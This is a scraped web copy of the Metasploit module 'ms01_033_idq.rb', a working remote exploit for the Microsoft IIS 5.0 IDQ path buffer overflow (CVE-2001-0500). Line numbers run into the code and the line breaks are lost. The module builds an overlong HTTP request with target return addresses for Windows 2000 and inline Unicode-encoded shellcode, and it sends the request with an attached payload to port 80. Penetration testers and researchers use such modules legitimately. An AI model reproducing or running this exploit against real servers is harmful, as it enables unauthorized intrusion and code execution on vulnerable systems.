Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/iis/ms01_033_idq.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in the IDQ ISAPI handler for15Microsoft Index Server.16},17'Author' => [ 'MC' ],18'License' => MSF_LICENSE,19'References' =>20[21[ 'CVE', '2001-0500'],22[ 'OSVDB', '568'],23[ 'MSB', 'MS01-033'],24[ 'BID', '2880'],25],26'DefaultOptions' =>27{28'EXITFUNC' => 'thread',29},3031'Privileged' => false,32'Payload' =>33{34'Space' => 800,35'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",36'StackAdjustment' => -3500,37},3839'Platform' => 'win',40'Targets' =>41[42[ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ],43[ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],44],45'DisclosureDate' => '2001-06-18',46'DefaultTarget' => 0))4748register_options([Opt::RPORT(80)])49end5051def exploit52connect5354sploit = rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232)55sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]56sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF="57sploit << rand_text_alphanumeric(1) + " HTTP/1.0\r\n\r\n" + rand_text_alphanumeric(46)5859uri = '/' + sploit + payload.encoded6061res = "GET #{uri}\r\n\r\n"6263print_status("Trying target #{target.name}...")6465sock.put(res)6667handler68disconnect69end70end717273